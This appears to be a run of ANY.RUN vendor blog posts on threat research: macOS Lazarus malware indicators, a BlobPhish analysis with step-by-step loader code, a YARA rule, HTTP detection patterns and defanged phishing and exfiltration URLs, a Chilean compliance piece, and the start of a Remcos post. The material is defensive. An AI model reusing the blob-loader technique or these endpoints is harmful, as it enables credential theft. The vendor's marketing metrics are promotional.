For SOC teams, the difficulty lies in detecting these attacks early, as they often slip past signature-based defenses by leveraging trusted services and user-driven actions. 

Close Detection Gaps with Stronger Cross-Platform Triage 

To combat these threats, SOCs must adopt interactive sandboxing as a cornerstone of their triage process. Unlike automated solutions, ANY.RUN eliminates critical blind spots for security teams by enabling analysis of malicious files and URLs across Windows, macOS, Linux, and Android in a single interface.  

Instead of juggling separate solutions for each OS, SOC teams gain a unified sandbox environment where they can manually simulate user interactions, uncover hidden attack stages, and capture behavioral IOCs, such as unusual sysctl queries in macOS or Mach-O binary execution.  

For business processes, this means streamlined triage, reducing analysis time and integrating seamlessly with SIEM/SOAR for automated threat investigations.  

ANY.RUN delivers full attack context (process chains, network connections, system changes), which is especially critical for companies with hybrid infrastructures (corporate Windows, macOS for developers/designers, Linux servers, and employee Android devices), where traditional sandboxes cover only part of the risk. 

When integrated into your SOC workflows, ANY.RUN’s Sandbox delivers measurable impact, enabling security teams to: 

• Identify Credential Exposure Earlier: Detect threats in under 60 seconds and reduce breach probability before escalation begins  

• Reduce MTTR: Achieve up to 21 minutes faster response time and 50% quicker IOC extraction  

• Detect More Relevant Threats: Identify up to 58% more threats with real-time, sandbox-verified intelligence  

• Minimize High-Severity Incidents: Earlier detection lowers escalation rates and limits impact on business operations  

• Improve SOC Efficiency Without Hiring: Increase team performance up to 3x and reduce Tier 1 workload by 20% 

 
For businesses, this means fewer breaches, lower financial impact per incident, and more predictable security outcomes. Organizations gain control over both risk exposure and operational costs, rather than reacting after damage occurs. 

About ANY.RUN 

ANY.RUN helps over 15,000 organizations and 600,000 security professionals identify and understand threats before they turn into incidents. 

The solutions combine interactive sandbox analysis and real-time threat intelligence into a single workflow, allowing SOC teams to analyze files and URLs, observe full attack behavior, and make faster, more accurate decisions. Instead of relying on delayed indicators or assumptions, analysts see what the threat actually does and what risk it creates for the business. 

By strengthening monitoring, triage, and response, ANY.RUN enables organizations to detect more threats earlier, reduce response time, and limit the impact of credential theft, data exposure, and account compromise. 

The result is a more predictable and efficient SOC, where decisions are made faster, incidents are contained earlier, and business risk is reduced. 

IOCs and TTPs 

Network IOCs 

IP Addresses 

• 172[.]86[.]113[.]102  

• 144[.]172[.]114[.]220  

Domains 

• update-teams[.]live  

• livemicrosft[.]com  

URLs 

• h[tt]p://172[.]86[.]113[.]102/Onedrive  

• h[tt]ps://update-teams[.]live/teams  

• h[tt]p://172[.]86[.]113[.]102/localencode  

• livemicrosft[.]com/meet/89035563931?p=9jXK14VFM8fObdKxfkake8tD7rPhzs.1  

File-based IOCs 

File Names 

File Paths 

File Hashes (SHA256) 

• eb3eae776d175f7fb2fb9986c89154102ba8eabfde10a155af4dfb18f28be1b5 (com.onedrive.launcher.plist)  

• eb3eae776d175f7fb2fb9986c89154102ba8eabfde10a155af4dfb18f28be1b5 (com.onedrive.launcher.tmp)  

• 0f41fd82cac71e27c36eb90c0bf305d6006b4f3d59e8ba55faeacbe62aadef90 (D1yCPUyk.bin)  

• 0f41fd82cac71e27c36eb90c0bf305d6006b4f3d59e8ba55faeacbe62aadef90 (D1YrHRTg.bin)  

• a9562ab6bce06e92d4e428088eacc1e990e67ceae6f6940047360261b5599614 (localencode / OneDrive)  

• 85bed283ba95d40d99e79437e6a3161336c94ec0acbc0cd38599d0fc9b2e393c (macrasv2)  

• cc31b3dc8aeed0af9dd24b7e739f183527d55d5b5ecd3d93ba45dd4aaa8ba260 (MauroDPRKSamples.zip)  

• 4b08a9e221a20b8024cf778d113732b3e12d363250231e78bae13b1f1dc1495b (minst2.bin)  

• 89616a503ffee8fc70f13c82c4a5e4fa4efafa61410971f4327ed38328af2938 (SystemApp.zip)  

• dfee6ea9cafc674b93a8460b9e6beea7f0eb0c28e28d1190309347fd1514dbb6 (TeamsApp.zip)  

• 871d8f92b008a75607c9f1feb4922b9a02ac7bd2ed61b71ca752a5bed5448bf3 (teamsSDK.bin)  

• 24af069b8899893cfc7347a4e5b46d717d77994a4b140d58de0be029dba686c9 (ZoomApp.zip)  

Host-based IOCs 

Persistence Artifacts 

• ~/Library/LaunchAgents/com.onedrive.launcher.plist  

• ~/Library/LaunchAgents/com.onedrive.launcher.tmp  

Suspicious Directories / Files 

• ~/Library/.initialized  

• /Users/$USER/.local/bin/OneDrive  

• $TMPDIR/geniex_client_sleep_state  

Code / Binary Artifacts 

Strings 

• geniex-client/core  

• geniex-client/protocol  

• geniex-client/Internal/vss  

• geniex_client_sleep_state  

• geniex config file too short  

• com.onedrive.launcher  

• Die command received, initiating self-destruction  

• hobocopy_%d  

Build Artifact 

• GoBuildID: 
  XSnX8a5Y1OweX0Ob6lfO/ZYlrxu-H_BNvt5ptXb3c/8HR_X2LwoFzXXN4Fti_K/xaM13na_g6snvgcy0x9t  

Encryption Keys 

• RC4Key: 
  a73ce18952b40fd621789e43c56b2af08d1497ce3560b2481fa973d8265ce491  

• RC4Key: 
  5476bbf8ddb2fb056295f09ebe05e20a7d1cf29ea279cd4613c87544013e080fef35c97b3511ef9c0f12e505a1d805628ba10483dc9290508f94d153ee94d5c4 

ATT&CK Matrix 

Execution 

• User Execution (T1204)  

Persistence 

• Create or Modify System Process: Launch Agent (T1543.001)  

Privilege Escalation 

• Abuse Elevation Control Mechanism: Sudo and Sudo Caching (T1548.003)  

Defense Evasion 

• File and Directory Permissions Modification (T1222)  

• Virtualization/Sandbox Evasion (T1497)  

Credential Access 

• Credentials from Password Stores (T1555)  

• Unsecured Credentials (T1552)  

Discovery & Collection 

• System Information Discovery (T1082)  

• Process Discovery (T1057)  

• System Time Discovery (T1124)  

• File and Directory Discovery (T1083)  

• Data from Local System (T1005)  

• Archive Collected Data (T1560)  

Exfiltration 

• Exfiltration Over Web Service: Exfiltration to Cloud Storage / Web Service (T1567)  

Data is exfiltrated via Telegram bot API, using a legitimate web service to evade detection. 

References 

Original Quetzal Team Article: https://open.substack.com/pub/quetzalteam/p/north-koreas-safari-hunting-for-rats  

Original LevelBlue Labs Intelligence Pulse: https://otx.alienvault.com/pulse/69d9c62d24ae9bc8d5653f56  

Session 1: https://app.any.run/tasks/937afde2-5e3c-4eb0-a7d1-6124f0f3ed18 

Session 2: https://app.any.run/tasks/777b23e8-25ea-45b5-a998-d2e1c400c9d1 

Session 3: https://app.any.run/tasks/7f771a62-fcda-4a33-8e99-ab068fae8500 

Session 4: https://app.any.run/tasks/94b9bc1f-86ff-4069-8222-1cb511d78ad9

The post New Lazarus APT Campaign: “Mach-O Man” macOS Malware Kit Hits Businesses appeared first on ANY.RUN's Cybersecurity Blog.

The campaign targets credentials across multiple platforms, including Microsoft 365, banking services, and webmail portals, making it both widespread and high-impact. 

Key Takeaways 

• Memory-resident evasion: BlobPhish loads entire phishing pages as in-browser blob objects, bypassing file-based and network-based detection entirely. 

• Broad targeting: The campaign hits Microsoft 365 alongside major U.S. banks (Chase, Capital One, FDIC, E*TRADE, Schwab) and webmail services. 

• Persistent and active: First observed in October 2024, the operation continues uninterrupted as of April 2026 with a major spike in February 2026. 

• Compromised infrastructure: Attackers routinely abuse legitimate WordPress sites and reuse exfiltration endpoints (res.php, tele.php, panel.php). 

• High-value credential theft: Stolen accounts enable BEC, data exfiltration, and lateral movement — threats that carry multimillion-dollar consequences. 

• Global but finance-focused: One-third of victims are in the U.S.; phishing pages almost exclusively mimic premium financial and Microsoft services regardless of victim industry. 

• ANY.RUN delivers proactive defense: Sandbox instantly reveals blob behavior in real browsers, while TI Lookup and TI Feeds provide real-time IOCs and YARA rules for automated blocking and hunting, turning reactive security into prevention. 

How BlobPhish works 

The attack is based on the abuse of browser Blob objects to serve fake authentication forms. A JavaScript loader, fetched from an attacker-controlled page, constructs a Blob from a Base64-encoded payload and loads it directly into browser memory — never touching disk and never generating the traditional HTTP requests that security tools rely on to detect phishing. 

Targeted services include: Microsoft 365, OneDrive, SharePoint, Chase, FDIC, Capital One, E*Trade, American Express, Charles Schwab, Merrill Lynch, PayPal, Intuit, and others. 

Technical Deep Dive 

Because the phishing page exists only in memory and is referenced by the scheme blob:https://, it cannot be blocked by URL reputation engines, does not appear in proxy logs as a suspicious request, and leaves no cache artefact. This makes BlobPhish significantly harder to detect and investigate than conventional phishing. 

View the observed analysis session in ANY.RUN sandbox 

1. Delivery Vector 

The typical initial access point is a phishing email or a link to a trusted-looking service such as DocSend. Example phishing link: hxxps[://]docsend[.]com/view/vsrrknxprh2xt84n 
 
Upon clicking, the victim is redirected to an HTML page that contains the loader script. Example loader URL: hxxps[://]mtl-logistics[.]com/blb/blob[.]html 

2. Loader Script — Step by Step 

The loader uses jQuery to perform the following sequence invisibly to the user: 

• var a = $(“<a style=’display: none;’/>”) 
  Creates an invisible HTML anchor element; 

• var decodedStringAtoB = atob(encodedStringAtoB) 
  Decodes the Base64 payload; 

• const myBlob = new Blob([decodedStringAtoB], { type: ‘text/html’ });  →  Constructs the Blob object; 

• const url = window.URL.createObjectURL(myBlob) 
  Generates the blob: URL; 

• a.attr(“href”, url) 
  Attaches the URL to the hidden anchor; 

• $(“body”).append(a) 
  Injects the anchor into the DOM; 

• a[0].click() 
  Triggers navigation to the phishing page; 

• window.URL.revokeObjectURL(url); + a.remove() 
  Destroys evidence from memory and DOM. 

3. The Phishing Page 

The victim sees a convincing Microsoft 365 (or other financial service) login page. The browser address bar shows the scheme blob:https://, which can appear legitimate to an untrained eye.  

The page contains: 

• A spoofed credential-capture form:  

• Specific set of selectors for the used HTML elements:

• Exfiltration logic that POSTs captured credentials to an attacker-controlled endpoint:

• A failed-login counter to force repeated credential entry (increasing harvest accuracy), a final redirect to the legitimate service website to avoid suspicion: 

• Data is sent via a POST request as form-data: 

Observed exfiltration endpoint pattern: 

hxxps[://]mtl-logistics[.]com/css/sharethepoint/point/res[.]php 

4. YARA Detection Rule

The following YARA rule matches the loader HTML page and can be used in ANY.RUN Threat Intelligence Lookup to hunt for BlobPhish infrastructure: 

rule BlobPhishLoaderHTML 

{ 

    meta: 

        author = "ANY.RUN" 

        description = "Matches HTML pages with JS-script which creates and loads 

                       phishing page as blob-object" 

    strings: 

        $s1 = "function saveFile(" ascii 

        $s2 = "var a = $(\"<a style='display: none;'/>\");" fullword ascii 

        $s3 = "var encodedStringAtoB" fullword ascii 

        $s4 = "var decodedStringAtoB = atob(encodedStringAtoB);" fullword ascii 

        $s5 = "window.URL.createObjectURL(myBlob);" fullword ascii 

        $s6 = "window.URL.revokeObjectURL(url);" fullword ascii 

    condition: 

        all of them 

} 

5. Exfiltration Infrastructure by Target 

Pivoting on url:”/res.php$” and via the YARA rule above, ANY.RUN researchers identified multiple targets and corresponding exfiltration URLs.  

1. Capital One 

View sandbox analysis 

Exfiltration URL: hxxps[://]wajah4dslot[.]com/wp-includes/certificates/tmp//res[.]php 

2. Chase Banking

View sandbox analysis 

Exfiltration URL: hxxps[://]hnint[.]net/cgi-bin/peacemind//res[.]php 

3. Morgan Stanley E*Trade

View sandbox analysis 

Exfiltration URL: hxxps[://]ftpbd[.]net/wp-content/plugins/cgi-/trade/trade//res[.]php

Variants with exfiltration to url:”*/tele.php” with a roughly similar request structure were also observed view a sandbox analysis with exfiltration URL hxxps[://]_wildcard_[.]gonzalezlawnandlandscaping[.]com/zovakmf/exfuzaj/pcnlwyf/cgi-ent/tele[.]php.

Importantly, in some cases calls to the service endpoint /panel.php have been observed. In response to a POST request, an error and its description (e.g., “IP not found”) are returned. 
 
Example POST URL: hxxps[://]hnint[.]net/cgi-bin/peacemind//panel[.]php 

6. HTTP Detection Patterns 

The following HTTP traffic signatures reliably identify BlobPhish activity in proxy and SIEM logs: 

• POST */res.php  — credentials in body (MIME: form-data or x-www-form-urlencoded); 

• POST */tele.php  — credentials in body (MIME: form-data or x-www-form-urlencoded); 

• POST */panel.php  — empty body; response: JSON with error & description (e.g., “IP not found”). 

7. Delivery Methods 

The following initial-access vectors have been observed: 

• Phishing emails with financial lures (suspicious transaction, personal loan/operation confirmation, invoice & document signature, disputed payment); 

• PDF attachments containing a QR code that leads to a malicious JS page and subsequently the blob:http scheme and */res.php exfiltration pattern (observed in an energy-sector campaign); 

• Shortened links (e.g., via t.co) redirecting through JS to the blob:http payload; 

• Links to legitimate-looking document-sharing services such as DocSend. 

Threat Landscape 

First spotted in October 2024, BlobPhis has proved itself as a sustained, continuously evolving campaign that remains active at the time of publication. 

Analysis of related artefacts shows that the threat actors regularly rotate infrastructure, exfiltration endpoints, loader hosting domains, and phishing lure themes. They also vary the path names of the loader pages (blob.html, blom.html, bloji.html, emailandpasssss.html) and exfiltration scripts (res.php, tele.php), complicating static signature-based detection. 

Targeted Industries 

Although the phishing lures predominantly impersonate financial and cloud services, the victim organizations span multiple sectors: 

• Finance, 

• Manufacturing, 

• Education, 

• Government, 

• Transport, 

• Telecommunications.  

Regardless of the victim’s industry, attackers focus on harvesting credentials for high-value financial and cloud corporate services — increasing the probability of capturing credentials that unlock significant monetary or data assets. 

Financial institutions and cloud-productivity platforms most frequently spoofed: 

• Capital One, 

• American Express, 

• JPMorgan Chase, 

• Intuit, 

• Charles Schwab, 

• Morgan Stanley’s E*TRADE, 

• Merrill Lynch, 

• PayPal, 

• Microsoft 365 / OneDrive / SharePoint (used as a document-access lure).  

Geography 

Approximately one-third of observed activity involves US-based users and organisations. BlobPhish  activity has been observed from: Germany, Poland, Spain, Switzerland, United Kingdom, Australia, South Korea, Saudi Arabia, Qatar, Jordan, India, and Pakistan. 

Business Impact: Why BlobPhish Is a Board-Level Risk 

BlobPhish does not just steal one employee’s password. By targeting the financial, cloud, and productivity accounts that employees use every day, a single successful compromise can cascade into: 

• Unauthorized wire transfers or fraudulent invoices (Business Email Compromise follow-on); 

• Full Microsoft 365 tenant takeover — email, SharePoint, Teams, and connected SaaS apps; 

• Regulatory exposure (GDPR, SEC, FFIEC, PCI-DSS) from confirmed data exfiltration; 

• Reputational damage when customer or partner data is compromised; 

• Operational disruption if attacker pivots to ransomware after credential harvest. 

Security and risk teams should model the following impact chains when a BlobPhish credential is compromised: 

• Microsoft 365 credential → MFA fatigue or session token theft → full mailbox access → BEC fraud or data exfiltration to partners/clients; 

• Banking credential (Chase, CapitalOne) → account takeover → wire fraud or ACH manipulation; 

• Investment platform credential (Schwab, E*TRADE, Merrill) → unauthorized trades or fund transfer; 

• Any cloud credential → lateral movement to connected SaaS → ransomware deployment. 

Regulatory consequences may include mandatory breach notification under GDPR (72-hour window), SEC cybersecurity incident disclosure requirements, and FFIEC guidance on authentication for financial institutions. 

How ANY.RUN Helps You Stay Ahead 

ANY.RUN provides the complementary capabilities that address BlobPhish at every stage of the threat lifecycle: from proactive hunting to real-time detection and automated feed enrichment. 

1. Analyze Alerts & Artifacts to Prevent Attack 

When a suspicious link or email is forwarded to the security team, ANY.RUN’s fully interactive cloud sandbox executes the entire BlobPhish kill chain in a safe cloud environment: 

• The JavaScript loader runs, the Base64 payload is decoded, and the blob: URL is created, exactly as it would on a victim’s machine. 

• Analysts watch the live session and see the fake login page render, observe the POST to */res.php, and capture all network artefacts. 

• Because execution happens in a real browser, there are no emulation gaps that the attacker’s anti-sandbox checks could exploit. 

• Full analysis reports — including screenshots, network traffic, memory artefacts, and extracted IOCs — are generated in minutes. 

This means your SOC can definitively confirm or dismiss a BlobPhish suspicion within minutes rather than hours, without risking any internal system. 

2. Stop Future Attacks by Enriching Proactive Defense 

Threat Intelligence Lookup gives threat hunters direct, query-based access to the ANY.RUN database of analyzed samples and infrastructure: 

• Run YARA-based searches to find all samples matching the BlobPhishLoaderHTML rule. 

• Pivot on URL patterns (url:”/res.php$”, url:”*/blob.html$”) to discover new attacker infrastructure the moment it appears in the wild. 

url:”*/res.php$” AND url:”*/blob.html$” and threatName:”phishing” 

• Correlate domains, IPs, file hashes, and HTTP patterns across millions of analyzed tasks. 

• Export results directly into SIEM, SOAR, or ticketing workflows. 

Security teams can monitor this campaign continuously rather than reacting after a compromise. New loader domains and exfiltration endpoints are surfaced as soon as ANY.RUN community members (and automated systems) submit related tasks. 

3. Automate Monitoring with Live Intelligence 

Threat Intelligence Feeds deliver structured, machine-readable threat intelligence in STIX/TAXII or flat-file formats, enabling automated enforcement across your security stack: 

• BlobPhish-related domains, IPs, and URL patterns are automatically pushed to firewalls, proxies, and SIEM correlation rules. 

• Indicators are enriched with context (campaign name, targeted brand, exfiltration pattern, confidence level) so that alerts are actionable, not just noisy. 

• Feeds are updated in near-real-time as the campaign evolves, meaning your defenses track the attacker’s infrastructure rotation without manual analyst effort. 

• Integration is supported with leading SIEM/SOAR platforms (Splunk, Microsoft Sentinel, Palo Alto XSOAR, and others) via standard connectors. 

Rather than relying solely on reactive detection, TI Feeds shift your posture to proactive blocking: exfiltration endpoints are denied before a single employee credential can be harvested. 

Indicators of Compromise (IOCs) 

URLs 

• hxxps[://]mtl-logistics[.]com/blb/blob[.]html 

• hxxps[://]mtl-logistics[.]com/css/sharethepoint/point/res[.]php 

• hxxps[://]larva888[.]com/wp-includes/css/dist/tmp/vmo[.]html 

• hxxps[://]wajah4dslot[.]com/wp-includes/certificates/tmp//res[.]php 

• hxxps[://]wajah4dslot[.]com/wp-includes/certificates/tmp//panel[.]php 

• hxxps[://]mail[.]hubnorte[.]com[.]br/blom[.]html 

• hxxps[://]riobeautybrazil[.]com/wp-admin/amx/res[.]php 

• hxxps[://]riobeautybrazil[.]com/wp-admin/amx/panel[.]php 

• hxxps[://]hnint[.]net/bloji[.]html 

• hxxps[://]hnint[.]net/cgi-bin/peacemind//res[.]php 

• hxxps[://]hnint[.]net/cgi-bin/peacemind//panel[.]php 

• hxxps[://]ftpbd[.]net/wp-content/plugins/cgi-/trade/blob[.]html 

• hxxps[://]ftpbd[.]net/wp-content/plugins/cgi-/trade/trade//res[.]php 

• hxxps[://]ftpbd[.]net/wp-content/plugins/cgi-/trade/trade//panel[.]php 

• hxxps[://]i-seotools[.]com/wp-content/citttboy[.]html 

• hxxps[://]mts-egy[.]net/wp-content/plugins/owpsyzj/cgi-ent/res[.]php 

• hxxps[://]mts-egy[.]net/wp-content/plugins/owpsyzj/cgi-ent/panel[.]php 

• hxxps[://]localmarketsense[.]com/wp-includes/Text/sxzmqkp/krtxbvo/sahz1xi/cgi-ent/emailandpasssss[.]html 

• hxxps[://]_wildcard_[.]gonzalezlawnandlandscaping[.]com/zovakmf/exfuzaj/pcnlwyf/cgi-ent/tele[.]php 

Domains 

• mtl-logistics[.]com 

• larva888[.]com 

• wajah4dslot[.]com 

• mail[.]hubnorte[.]com[.]br 

• riobeautybrazil[.]com 

• hnint[.]net 

• ftpbd[.]net 

• i-seotools[.]com 

• mts-egy[.]net 

Conclusion 

BlobPhish represents a mature, well-maintained phishing operation that has been running continuously for over eighteen months. Its core innovation — abusing the browser’s Blob URL API to serve phishing pages entirely in memory — renders the campaign invisible to a wide range of conventional controls including secure email gateways, URL filters, web proxies, and file-based endpoint solutions. 

For security teams, the takeaway is clear: static and perimeter-based defenses are insufficient against this class of attack. Effective defense requires dynamic analysis (to execute and observe the full attack chain), proactive threat hunting (to discover attacker infrastructure before it is weaponized against your organization), and automated, continuously updated threat intelligence feeds that propagate IOCs across the entire security stack in near-real-time. 

About ANY.RUN   

ANY.RUN, a leading provider of interactive malware analysis and threat intelligence solutions, helps security teams investigate threats faster and with greater clarity across modern enterprise environments.   

It allows teams to safely execute suspicious files and URLs, observe real behavior in an Interactive Sandbox, enrich indicators with immediate context through TI Lookup, and monitor emerging malicious infrastructure using Threat Intelligence Feeds. Together, these capabilities help reduce investigation uncertainty, accelerate triage, and limit unnecessary escalations across the SOC.   

ANY.RUN is trusted by thousands of organizations worldwide and meets enterprise security and compliance expectations. It is SOC 2 Type II certified, demonstrating its commitment to protecting customer data and maintaining strong security controls. 

FAQ

The post BlobPhish: The Phantom Phishing Campaign Hiding in Browser Memory appeared first on ANY.RUN's Cybersecurity Blog.

Key Takeaways 

• Chile’s Cybersecurity Framework Law raises the pressure on operational readiness: Security leaders need teams that can detect threats, investigate incidents, and support response decisions without delay. 

• Slow investigation can quickly become a business risk: Delayed response weakens evidence, increases regulatory pressure, and makes post-incident review harder to manage. 

• Faster triage and clearer evidence now matter more: Better visibility into suspicious activity helps reduce disruption, improve reporting quality, and support faster decisions under tight deadlines. 

• For business leaders, this is about continuity as much as compliance: Teams must be able to contain incidents, document actions, and maintain control during regulatory scrutiny. 

• ANY.RUN’s Enterprise solutions help reduce operational risk under compliance pressure: They support faster investigations, stronger evidence, and more controlled analysis workflows. 

The Regulatory Shift 

Chile has taken a decisive step toward strengthening its national cybersecurity posture with the approval of Law No. 21.663 – the Cybersecurity Framework Law. This legislation establishes mandatory cybersecurity obligations for organizations classified as: 

• Operators of Vital Importance (OIV) 

• Operators of Essential Services 

• Critical public sector entities 

Unlike traditional compliance frameworks that focus on policies and documentation, Chile’s approach is outcome-driven and risk-based. Organizations must demonstrate real operational capabilities– not just checkbox compliance. With enforcement and audits ramping up through 2025-2026, the compliance window is closing fast.

The scope is broad. An estimated 915 organizations across energy, telecommunications, banking and financial services, digital infrastructure, healthcare, and public institutions must now prove their cybersecurity readiness.

What the New Law Requires from Security Teams 

Chile’s Cybersecurity Framework Law does not mandate specific tools, but it does set clear expectations for operational readiness. Regulated organizations are expected to have the following: 

 Effective threat detection: Identify malicious activity before it causes damage 
Timely incident analysis and response: Understand what happened, how, and what to do 
Continuous risk management: Adapt defenses as the threat landscape evolves 
Evidence-based reporting: Provide detailed, defensible reports to Chile’s national CSIRT and regulatory authorities 

Regulated entities must permanently apply technical and organizational measures to prevent, report, and resolve cybersecurity incidents in line with ANCI protocols and sector-specific standards. They must also report significant cyberattacks and incidents to the national CSIRT under a defined timeline. 

For operators of vital importance, requirements are stricter. They must run a continuous information security management system, document security actions, and maintain certified cybersecurity and continuity plans, reviewed at least every two years.

They are also expected to conduct regular exercises, implement rapid containment measures, train staff, and appoint an independent cybersecurity delegate with direct access to top management and formal responsibility for coordination with ANCI. 

The reporting timelines are especially important for CISOs, SOC leaders, and MSSPs serving regulated clients. The law requires an early warning within three hours after learning of a significant incident, an updated report within 72 hours, and a final report within 15 days.

If the affected entity is an OIV and the incident disrupts its essential service, the second report deadline tightens to 24 hours. OIVs must also communicate a formal action plan within seven days. 

The key shift is simple: the law focuses less on documented intent and more on proven capability. It is not enough to say controls are in place. Organizations need to show they can investigate suspicious activity, confirm whether a threat is real, and support response decisions with evidence. 

That changes the standard for security teams. Alerts alone are not enough. Teams need visibility, faster analysis, and a reliable investigation trail they can stand behind during reporting, audits, and post-incident review. 

What Non-Compliance Can Cost 

The legal exposure is serious. Minor infringements can be fined up to 5,000 UTM, serious infringements up to 10,000 UTM, and very serious infringements up to 20,000 UTM. For operators of vital importance, those maximums double to 10,000, 20,000, and 40,000 UTM respectively.  

For leadership, the business risk goes beyond the fine itself. When teams cannot investigate suspicious activity quickly, explain what happened, or produce defensible incident evidence, the result can be longer disruption, slower communication with authorities, and more exposure during audits. That is why this law should not be treated as only a legal issue. It is also a detection, response, and operational-readiness issue. 

The Compliance Challenge: Why This Is Hard 

For SOCs and incident response teams across Chile, the new requirements create significant operational pressure: 

1. Alert Overload, Limited Analysis Capacity 

Chilean organizations are facing the same challenge plaguing SOCs globally: too many alerts, not enough time to investigate them properly. SOC teams are drowning in noise from SIEM and EDR platforms, struggling to separate real threats from false positives. 

2. Talent Shortage 

The cybersecurity skills gap is acute in Latin America. According to industry data, LATAM experiences approximately 2,716 cyberattacks per organization per week, significantly above the global average. Yet there aren’t enough trained analysts to keep pace with investigation demands. 

3. Malware Analysis Bottlenecks 

Many sandbox solutions provide a verdict, but limited visibility into how the threat behaves or why it matters. When regulators ask for detailed incident reports, security teams need more than a malicious or benign label. They need evidence, context, and a clearer view of the attack chain. 

4. Rising Threat Sophistication 

Attackers targeting Latin America, particularly Chile’s banking and financial sectors, are deploying region-specific malware families like Mekotio, Grandoreiro, and Casbaneiro. These threats use novel evasion techniques specifically designed to bypass legacy detection systems.

Close the Security Gap with Better Threat Visibility, Analysis, and Response 

Under Chile’s new framework, security gaps are no longer just technical weaknesses. They can become compliance failures, reporting delays, and broader business risks. ANY.RUN helps organizations close those gaps with stronger threat visibility, faster analysis, and more defensible response workflows. 

1. Threat Intelligence for Better Visibility and Prioritization 

One of the hardest parts of compliance is knowing which threats deserve immediate attention. Security teams already deal with large volumes of alerts, but the new law raises the need for monitoring that is not only active, but relevant to actual business risk. 

ANY.RUN’s Threat Intelligence Lookup helps teams focus on threats that matter most to their environment. Rather than treating threat intelligence as just another dataset, it works as an operational layer that connects threat context with prioritization and action across the SOC lifecycle. Instead of relying only on generic indicators, organizations can investigate threats through industry- and geo-specific context. 

For example, a query such as submissionCountry:”CL” AND industry:”banking” can help teams understand what is actively targeting Chile’s financial sector. This gives analysts faster context for triage, supports continuous risk management, and helps organizations build monitoring around real threats rather than assumptions. 

With this approach, organizations can: 

• Focus security efforts on the threats most relevant to their sector 

• Improve prioritization across monitoring and triage workflows 

• Reduce investigation delays caused by low-context alerts 

• Strengthen continuous risk management with more relevant threat visibility 

• Build a stronger foundation for defensible response and reporting 

2. Behavioral Analysis for Faster Investigation and Clearer Evidence 

Threat visibility is only the first step. Once a suspicious file, URL, or email is detected, teams still need to understand what it actually does, how serious it is, and what actions should follow. 

ANY.RUN’s Interactive Sandbox helps security teams investigate threats through real behavioral analysis. Instead of receiving only a verdict, analysts can observe malicious activity as it unfolds, understand the attack chain, extract indicators, and see the broader context of the incident. This makes it easier to validate threats faster, support containment decisions, and produce clearer evidence for reporting, audits, and post-incident review. 

In practice, this allows organizations to: 

• Understand how a threat behaves, not just whether it is malicious 

• Confirm impact faster and make response decisions with more confidence 

• Extract IOCs and other evidence for reporting and follow-up investigation 

• Support containment with clearer visibility into attacker activity 

• Build a more defensible investigation trail for audits and incident review 

3. Integrations and Threat Feeds for Faster Detection and Response 

Meeting regulatory expectations also depends on how quickly security teams can move from detection to action. When threat data stays locked in separate tools or requires manual handling, triage slows down, response becomes less consistent, and reporting gets harder under tight deadlines. 

ANY.RUN helps reduce that friction by connecting threat intelligence and sandbox analysis directly to existing security workflows through ready-made connectors, STIX/TAXII, and API/SDK options. This allows teams to move investigation data into SIEM, SOAR, EDR, and TIP environments faster, so enrichment, correlation, and response can happen with less manual effort.  

Threat Intelligence Feeds continuously deliver high-confidence malicious indicators sourced from live attack investigations across 15,000 organizations and 600,000 analysts, helping teams work with fresh threat data instead of static lists.  

This gives organizations the ability to: 

• Push fresh threat data directly into existing detection and response tools 

• Reduce manual workload in enrichment and triage workflows 

• Improve alert quality with validated, high-confidence indicators 

• Speed up correlation and response across the SOC stack 

• Build a more scalable and operationally consistent security model 

Support Compliance Readiness with Privacy, Control, and Audit Confidence 

Security teams also need confidence that sensitive analyses can be handled in a controlled environment that supports internal governance, confidentiality, and audit readiness. That is especially important for organizations working under stricter reporting obligations and higher regulatory scrutiny. 

ANY.RUN supports that need with SOC 2 Type II attested security and private, access-controlled sandbox analysis designed for confidential investigations.  

ANY.RUN’s private sandbox sessions remain confidential through strict access controls and encrypted data processing, helping organizations investigate threats without exposing case data to the public community. For leadership, this matters because improving detection and response is not enough on its own. The investigation environment also needs to meet enterprise expectations for security, privacy, and operational reliability.  

This becomes especially valuable when incidents involve sensitive internal files, regulated environments, or investigations that may later be reviewed by auditors, executives, or external authorities. With stronger privacy controls around analysis data, organizations can reduce the risk of accidental exposure while giving security teams a safer way to investigate suspicious activity and preserve a defensible trail of evidence. 

About ANY.RUN 

ANY.RUN, a leading provider of interactive malware analysis and threat intelligence solutions, helps security teams investigate threats faster and with greater clarity across modern enterprise environments.   

It allows teams to safely execute suspicious files and URLs, observe real behavior in an Interactive Sandbox, enrich indicators with immediate context through TI Lookup, and monitor emerging malicious infrastructure using Threat Intelligence Feeds. Together, these capabilities help reduce investigation uncertainty, accelerate triage, and limit unnecessary escalations across the SOC.   

Frequently Asked Questions 

The post Chile’s Cybersecurity Framework Law: How SOCs Achieve Compliance and Response Readiness appeared first on ANY.RUN's Cybersecurity Blog.

This shift creates a dangerous asymmetry. Security controls often whitelist or inherently trust these services, while users are far less likely to question them. The result is a smoother path from inbox to infection. 

Key Takeaways 

• Attackers are shifting to trusted cloud infrastructure (Google Storage) to bypass email filters and reputation checks. 

• The multi-stage chain uses obfuscated JS/VBS/PowerShell and legitimate RegSvcs.exe for process injection, making static detection ineffective. 

• Remcos RAT provides full remote control, keylogging, and data exfiltration — turning one compromised endpoint into a persistent foothold. 

• Credential harvesting combined with malware delivery creates dual risk: immediate data theft plus long-term network compromise. 

• Traditional EDR relying on file reputation misses these attacks; behavioral sandboxing and real-time TI are required. 

• ANY.RUN’s Interactive Sandbox, TI Lookup, and TI Feeds enable proactive detection and rapid response, closing the gap before damage occurs. 
   

The New Face of Phishing: When “Legitimate” Becomes Lethal 

According to ANY.RUN’s annual Malware Trends Report for 2025, phishing driven by multi-stage redirect chains and trusted-cloud hosting has become the dominant attack vector, with RATs and backdoors rising 28% and 68% respectively. The abuse of legitimate platforms has made traditional reputation-based filtering fundamentally unreliable. 

Early detection is no longer simply a technical performance metric. It is a business continuity imperative. When threats hide inside trusted infrastructure, the window between initial infection and serious organizational impact can be measured in hours, not days. Security teams that cannot identify and contain an attack in its earliest stages — before the payload executes, before the C2 channel is established, before the attacker pivots deeper into the network — face an exponentially harder response challenge. 

Phishing Campaign Hiding Remcos RAT Inside Google Cloud Storage 

In April 2026, ANY.RUN’s threat research team identified a sophisticated multi-stage phishing campaign that perfectly exemplifies this new breed of attack. The campaign abuses Google Cloud Storage to host HTML phishing pages themed as Google Drive document viewers, ultimately delivering the Remcos Remote Access Trojan (RAT). 

View the attack in real time in a live sandbox session 

